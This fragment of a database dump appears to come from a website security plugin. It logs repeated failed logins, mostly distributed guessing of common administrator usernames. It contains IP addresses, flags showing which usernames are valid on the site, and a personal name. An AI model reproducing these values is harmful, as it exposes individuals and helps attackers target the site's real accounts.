(99624, 1493230812.357411, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99625, 1493230812.679753, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99626, 1493230813.002956, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99627, 1493230813.326540, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99628, 1493230813.648694, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99629, 1493230813.973260, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99630, 1493230814.297041, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99631, 1493230814.628044, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99632, 1493230814.956300, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99633, 1493230815.278606, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99634, 1493230815.603118, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99635, 1493230815.931636, 1, 'loginFailValidUsername', 'admin', 1, 2760119799, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(99636, 1493233404.410571, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3256088714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99637, 1493233405.687923, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3256088714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99638, 1493233679.460087, 1, 'loginFailValidUsername', 'admin', 1, 1833643342, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99639, 1493234491.897822, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3173215047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99640, 1493234493.445729, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3173215047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99641, 1493235589.747620, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1460850312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99642, 1493235591.283028, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1460850312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99643, 1493238293.306733, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2266490841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99644, 1493238294.434488, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2266490841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99645, 1493240707.534135, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1442094233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99646, 1493240708.605745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1442094233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99647, 1493242243.458116, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2548475614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99648, 1493242244.382755, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2548475614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99649, 1493242798.833785, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1651346743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99650, 1493242800.052831, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1651346743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99651, 1493243384.655988, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99652, 1493244130.202084, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 843509428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99653, 1493244131.511984, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 843509428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99654, 1493244412.128472, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99655, 1493245424.371331, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99656, 1493245537.912530, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 86750727, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99657, 1493246451.350585, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99658, 1493247481.236867, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99659, 1493247847.399627, 1, 'loginFailValidUsername', 'admin', 1, 1388450372, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99660, 1493248489.504719, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99661, 1493249519.075291, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99662, 1493250507.417030, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99663, 1493251530.168985, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99664, 1493252546.943807, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99665, 1493253264.221714, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3159244987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99666, 1493253551.971125, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99667, 1493254576.757700, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99668, 1493255592.069883, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99669, 1493256620.396436, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99670, 1493256849.092075, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142072067, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99671, 1493257627.168489, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99672, 1493258458.732103, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023829342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99673, 1493258460.074197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023829342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99674, 1493258653.878770, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99675, 1493259279.605399, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1147995635, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99676, 1493259663.748998, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99677, 1493260697.024932, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99678, 1493260800.772779, 1, 'loginFailValidUsername', 'admin', 1, 1578576348, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99679, 1493261050.215890, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892041857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99680, 1493261705.963004, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99681, 1493264207.656760, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398003026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99682, 1493264209.316606, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398003026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99683, 1493269667.692713, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2391196847, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99684, 1493272672.255283, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1286823711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99685, 1493272673.416342, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1286823711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99686, 1493272675.204620, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 88326778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99687, 1493272676.113215, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 88326778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99688, 1493274957.793472, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398335459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99689, 1493274959.100546, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398335459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99690, 1493275297.286588, 1, 'loginFailValidUsername', 'admin', 1, 1590206329, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99691, 1493279628.543055, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99692, 1493280611.841750, 1, 'loginFailValidUsername', 'julie', 2, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99693, 1493280612.674450, 1, 'loginFailValidUsername', 'julie', 2, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99694, 1493280613.492637, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99695, 1493280614.469209, 1, 'loginFailValidUsername', 'pablo', 3, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99696, 1493280615.478864, 1, 'loginFailValidUsername', 'admin', 1, 3560927088, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99697, 1493280638.248527, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99698, 1493281689.007268, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99699, 1493282701.478077, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99700, 1493283217.973130, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3651510709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99701, 1493283580.678715, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1317189474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99702, 1493283735.091198, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99703, 1493284766.483443, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99704, 1493285810.650499, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99705, 1493286229.784375, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549149366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99706, 1493286230.857594, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549149366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99707, 1493286832.315981, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99708, 1493287255.561397, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 698274019, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99709, 1493287257.210485, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 698274019, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99710, 1493287859.331555, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99711, 1493288917.169716, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99712, 1493289292.969535, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3114053210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99713, 1493289294.850834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3114053210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99714, 1493289657.720297, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335843221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99715, 1493289658.752834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335843221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99716, 1493289682.866847, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 778260109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99717, 1493289683.909026, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 778260109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99718, 1493289961.273468, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99719, 1493291001.818655, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99720, 1493291550.057672, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754777714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99721, 1493291552.185781, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754777714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99722, 1493292032.228695, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99723, 1493292443.920147, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1430890718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99724, 1493292445.192330, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1430890718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99725, 1493293081.796773, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99726, 1493294117.822114, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99727, 1493294384.285111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99728, 1493294385.440912, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3588843288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99729, 1493294830.160849, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1823113940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99730, 1493294831.257940, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1823113940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99731, 1493295141.399084, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99732, 1493295637.694101, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99733, 1493295639.193551, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99734, 1493295688.417935, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 977552699, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99735, 1493295689.946462, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 977552699, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99736, 1493296040.613480, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1449745144, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99737, 1493296096.268139, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981339500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99738, 1493296097.666988, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981339500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99739, 1493296191.059987, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99740, 1493297211.337588, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99741, 1493298260.877955, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99742, 1493299504.203745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2536339395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99743, 1493299505.450241, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2536339395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99744, 1493300070.973477, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694570146, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99745, 1493300083.073421, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694570146, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99746, 1493300928.095736, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598980920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99747, 1493300929.370467, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598980920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99748, 1493302076.785915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887828803, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99749, 1493303793.913824, 1, 'loginFailValidUsername', 'admin', 1, 2960954126, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99750, 1493304648.803691, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768073243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99751, 1493304649.900003, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768073243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99752, 1493305620.622049, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1396104586, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99753, 1493306311.558494, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744766569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99754, 1493306313.866048, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744766569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99755, 1493310765.866900, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3157204740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99756, 1493310999.764996, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3382964636, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99757, 1493311525.004783, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1981193994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99758, 1493311526.473118, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1981193994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99759, 1493311668.792487, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 858203606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99760, 1493311669.978423, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 858203606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99761, 1493312452.408631, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 637050808, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99762, 1493314252.237300, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658304580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99763, 1493314253.536128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658304580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99764, 1493314282.734749, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99765, 1493315296.488150, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99766, 1493315832.945203, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892043861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99767, 1493315834.943224, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892043861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99768, 1493316187.617921, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 28968311, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99769, 1493316321.758569, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
